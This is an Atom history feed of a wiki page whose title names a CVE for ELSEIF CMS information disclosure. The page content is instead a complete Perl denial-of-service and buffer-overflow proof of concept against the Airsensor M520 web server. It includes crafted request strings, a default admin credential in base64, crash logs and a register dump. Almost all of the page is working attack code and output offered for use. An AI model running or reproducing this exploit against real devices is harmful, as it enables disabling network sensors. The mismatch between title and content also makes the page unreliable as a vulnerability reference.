<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2007-5306_ELSEIF_CMS_Beta_0.6%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2007-5306 ELSEIF CMS Beta 0.6敏感信息泄漏漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2007-5306_ELSEIF_CMS_Beta_0.6%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2007-5306_ELSEIF_CMS_Beta_0.6%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T09:44:48Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2007-5306_ELSEIF_CMS_Beta_0.6%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E&amp;diff=847&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/perl -w #									 # Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC		 #									 # The vulnerability is caused due to a...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2007-5306_ELSEIF_CMS_Beta_0.6%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E&amp;diff=847&amp;oldid=prev"/>
		<updated>2021-04-01T03:31:44Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/perl -w #									 # Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC		 #									 # The vulnerability is caused due to a...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/perl -w&lt;br /&gt;
#									&lt;br /&gt;
# Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC		&lt;br /&gt;
#									&lt;br /&gt;
# The vulnerability is caused due to an unspecified error in the cgis	&lt;br /&gt;
# files filter used for configure propierties. This can be exploited by	&lt;br /&gt;
# sending a specially crafted HTTPS request (necessary authentication), &lt;br /&gt;
# which will cause the HTTPS service on the system to crash.		&lt;br /&gt;
#									&lt;br /&gt;
# Requisites: &amp;quot;Use DHCP&amp;quot; option interface mark &amp;quot;No&amp;quot;		&lt;br /&gt;
#									&lt;br /&gt;
# Examples:								&lt;br /&gt;
# 									&lt;br /&gt;
# GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1		&lt;br /&gt;
# GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1		&lt;br /&gt;
# GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1			&lt;br /&gt;
# 									&lt;br /&gt;
# Pinging:								&lt;br /&gt;
#									&lt;br /&gt;
# Before:								&lt;br /&gt;
#									&lt;br /&gt;
# Reply from 192.168.100.100: bytes=32 time&amp;lt;1ms TTL=64			&lt;br /&gt;
# Reply from 192.168.100.100: bytes=32 time&amp;lt;1ms TTL=64			&lt;br /&gt;
# Reply from 192.168.100.100: bytes=32 time&amp;lt;1ms TTL=64			&lt;br /&gt;
#									&lt;br /&gt;
# After:								&lt;br /&gt;
#									&lt;br /&gt;
# Hardware error.							&lt;br /&gt;
# Hardware error.							&lt;br /&gt;
# Hardware error.							&lt;br /&gt;
# Request timed out.							&lt;br /&gt;
# Request timed out.							&lt;br /&gt;
# Request timed out.							&lt;br /&gt;
#									&lt;br /&gt;
# C:\&amp;gt;nc -vvn 192.168.100.100 443					&lt;br /&gt;
# (UNKNOWN) [192.168.100.100] 443 (?): connection refused		&lt;br /&gt;
# sent 0, rcvd 0: NOTSOCK						&lt;br /&gt;
#&lt;br /&gt;
# Buffer Overflow debug log:&lt;br /&gt;
#&lt;br /&gt;
# 1970-01-01 00:00:15   SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520&lt;br /&gt;
# 1970-01-01 00:00:15   SYS-CRIT:: SENSOR EXCEPTION ERROR&lt;br /&gt;
# 1970-01-01 00:00:15   SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4&lt;br /&gt;
# 1970-01-01 00:00:15   SYS-CRIT:: SENSOR Up Time:  00:08:51&lt;br /&gt;
# 1970-01-01 00:00:15   SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55&lt;br /&gt;
# 1970-01-01 00:00:15   SYS-CRIT:: Exception ID = 10 ( Reserved Instruction)&lt;br /&gt;
# 1970-01-01 00:00:15   SYS-CRIT:: Thread = HTTPD&lt;br /&gt;
# 1970-01-01 00:00:15   SYS-CRIT:: MIPS Register Dump:&lt;br /&gt;
# 1970-01-01 00:00:15   SYS-CRIT::  zero=0x00000000    at=0xfffffffe    v0=0x00000000    v1=0x00000000&lt;br /&gt;
# 1970-01-01 00:00:16   SYS-CRIT::    a0=0x00000000    a1=0x3d000000    a2=0x00000010    a3=0x00000041&lt;br /&gt;
# 1970-01-01 00:00:16   SYS-CRIT::    t0=0x00000000    t1=0x0000003d    t2=0x0000000b    t3=0x00000000&lt;br /&gt;
# 1970-01-01 00:00:16   SYS-CRIT::    t4=0x802f799c    t5=0xf43dd40f    t6=0x0066a1a4    t7=0x4df0e494&lt;br /&gt;
# 1970-01-01 00:00:16   SYS-CRIT::    s0=0x802f7dbf    s1=0x0000001f    s2=0x802f7910    s3=0x80120000&lt;br /&gt;
# 1970-01-01 00:00:16   SYS-CRIT::    s4=0x80120000    s5=0x80986c30    s6=0x80120000    s7=0x80128afc&lt;br /&gt;
# 1970-01-01 00:00:16   SYS-CRIT::    t8=0x480ec8cd    t9=0x742b7136    k0=0x802f78c8    k1=0x802f7910&lt;br /&gt;
# 1970-01-01 00:00:16   SYS-CRIT::    gp=0x8015b070    sp=0x802f7910    fp=0x80128aec    ra=0x800b2534&lt;br /&gt;
# 1970-01-01 00:00:16   SYS-CRIT:: Address of instruction that caused exception = 0x800b2534&lt;br /&gt;
# 1970-01-01 00:00:16   SYS-CRIT:: Memory address at which adress exception occured = 0x00000000&lt;br /&gt;
# 1970-01-01 00:00:16   SYS-CRIT:: Return address = 0x800b2534&lt;br /&gt;
# 1970-01-01 00:00:17   SYS-CRIT:: Status Reg = 0x1000af03&lt;br /&gt;
# 1970-01-01 00:00:17   SYS-CRIT:: Cache Reg = 0x00000000&lt;br /&gt;
# 1970-01-01 00:00:17   SYS-CRIT:: Cause Reg = 0x30000028&lt;br /&gt;
# 1970-01-01 00:00:17   SYS-CRIT:: Config Reg = 0x03fffbfb&lt;br /&gt;
# 1970-01-01 00:00:17   SYS-CRIT:: Vector = 40&lt;br /&gt;
# 1970-01-01 00:00:17   SYS-CRIT:: Processor Version = 0x00018009&lt;br /&gt;
# 1970-01-01 00:00:17   SYS-CRIT:: Stack Trace Begin: &amp;quot;-&amp;gt;&amp;quot; = return address&lt;br /&gt;
# 1970-01-01 00:00:17   SYS-CRIT::   [802f7910]=0x802f7dbf&lt;br /&gt;
# 1970-01-01 00:00:17   SYS-CRIT::   [802f7914]=0x00000000&lt;br /&gt;
# 1970-01-01 00:00:17   SYS-CRIT::   [802f7918]=0x00000000&lt;br /&gt;
# 1970-01-01 00:00:19   SYS-CRIT::   [802f7990]=0x80130000&lt;br /&gt;
# 1970-01-01 00:00:19   SYS-CRIT::   [802f7994]=0x802f7db4&lt;br /&gt;
# 1970-01-01 00:00:19   SYS-CRIT::   [802f7998]=0x80152e18&lt;br /&gt;
# 1970-01-01 00:00:19   SYS-CRIT::   [802f799c]=0x80152ed8&lt;br /&gt;
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79a0]=0x802f7dbf&lt;br /&gt;
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79a4]=0x80986c30&lt;br /&gt;
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79a8]=0x802f8200&lt;br /&gt;
# 1970-01-01 00:00:19   SYS-CRIT:: -&amp;gt;[802f79ac]=0x800f0450	&amp;lt;- return address&lt;br /&gt;
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79b0]=0x0d0a0074&lt;br /&gt;
# 1970-01-01 00:00:21   SYS-CRIT:: Stack Trace End:&lt;br /&gt;
#									&lt;br /&gt;
# The vulnerability has been reported in versions Airdefense		&lt;br /&gt;
#&lt;br /&gt;
# Firmware Version 4.3.1.1, Model = M520&lt;br /&gt;
# Firmware version 4.4.1.4, Model = M520				&lt;br /&gt;
# &lt;br /&gt;
# More information: 	http://www.airdefense.net&lt;br /&gt;
#			http://support.airdefense.net&lt;br /&gt;
#&lt;br /&gt;
# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.&lt;br /&gt;
#				&lt;br /&gt;
# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, &lt;br /&gt;
# pikah, codebreak, h3llfyr3&lt;br /&gt;
#					&lt;br /&gt;
# Alex Hernandez ahernandez [at] sybsecurity dot com&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
use strict;&lt;br /&gt;
use LWP;&lt;br /&gt;
use Data::Dumper;&lt;br /&gt;
require HTTP::Request;&lt;br /&gt;
require HTTP::Headers;&lt;br /&gt;
&lt;br /&gt;
my $string = 	&amp;quot;%41%41%41&amp;quot;;			# Strings to send&lt;br /&gt;
my $method = 	'GET';				# Method &amp;quot;GET&amp;quot; or &amp;quot;POST&amp;quot;&lt;br /&gt;
my $uri = 	'https://192.168.100.100';	# Factory default IP address &lt;br /&gt;
my $content = 	&amp;quot;/adLog.cgi?&amp;quot;;			# Cgi's file to crash&lt;br /&gt;
&lt;br /&gt;
#my $content = 	&amp;quot;/ad.cgi?&amp;quot;;&lt;br /&gt;
#my $content = 	&amp;quot;/post.cgi?&amp;quot;;&lt;br /&gt;
#my $content = 	&amp;quot;/logout.cgi?&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
my $headers = HTTP::Headers-&amp;gt;new(&lt;br /&gt;
&lt;br /&gt;
'Host:'                	=&amp;gt; '192.168.100.100',&lt;br /&gt;
'User-Agent:'          	=&amp;gt; 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',&lt;br /&gt;
'Accept:'              	=&amp;gt; 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',&lt;br /&gt;
'Accept-Language:'     	=&amp;gt; 'en-us,en;q=0.5',&lt;br /&gt;
'Accept-Charset:'   	=&amp;gt; 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',     &lt;br /&gt;
'Keep-Alive:'          	=&amp;gt; '300',&lt;br /&gt;
'Connection:'          	=&amp;gt; 'keep-alive',&lt;br /&gt;
'Referer:'       	=&amp;gt; 'https://192.168.100.100/adLog.cgi?submitButton=refresh&amp;amp;refresh=Refresh',&lt;br /&gt;
'Authorization:'	=&amp;gt; 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode admin:airsensor&lt;br /&gt;
&lt;br /&gt;
);&lt;br /&gt;
&lt;br /&gt;
my $request = HTTP::Request-&amp;gt;new($method, $uri, $headers, $content, $string);&lt;br /&gt;
&lt;br /&gt;
my $ua = LWP::UserAgent-&amp;gt;new;&lt;br /&gt;
my $response = $ua-&amp;gt;request($request);&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;[+] Denial of Service exploit for Airsensor M520 Final\n&amp;quot;;&lt;br /&gt;
print &amp;quot;[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n&amp;quot;;&lt;br /&gt;
print &amp;quot;[+] We got this response from sensor: \n\n&amp;quot; . $response-&amp;gt;content . &amp;quot;\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
my $data;&lt;br /&gt;
	foreach my $pair (split('&amp;amp;', $response-&amp;gt;content)) {&lt;br /&gt;
 		my ($k, $v) = split('=', $pair);&lt;br /&gt;
 		$data-&amp;gt;{$k} = $v;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
if ($data-&amp;gt;{RESULT} != 0) {&lt;br /&gt;
&lt;br /&gt;
	print &amp;quot;[+] Denial of Service exploit for Airsensor M520 Final\n&amp;quot;;&lt;br /&gt;
	print &amp;quot;[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n&amp;quot;;&lt;br /&gt;
	print &amp;quot;[+] Use:\n&amp;quot;;&lt;br /&gt;
	print &amp;quot;\tperl -x dos_sensor.pl\n&amp;quot;;&lt;br /&gt;
 	print $data-&amp;gt;{RESPMSG} . &amp;quot;\n&amp;quot;;&lt;br /&gt;
	exit(0);&lt;br /&gt;
&lt;br /&gt;
} else {&lt;br /&gt;
&lt;br /&gt;
 	print &amp;quot;[+] Denial of service Exploit successed!!!\n&amp;quot;;&lt;br /&gt;
	print &amp;quot;[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n&amp;quot;;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
# milw0rm.com [2007-09-18]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>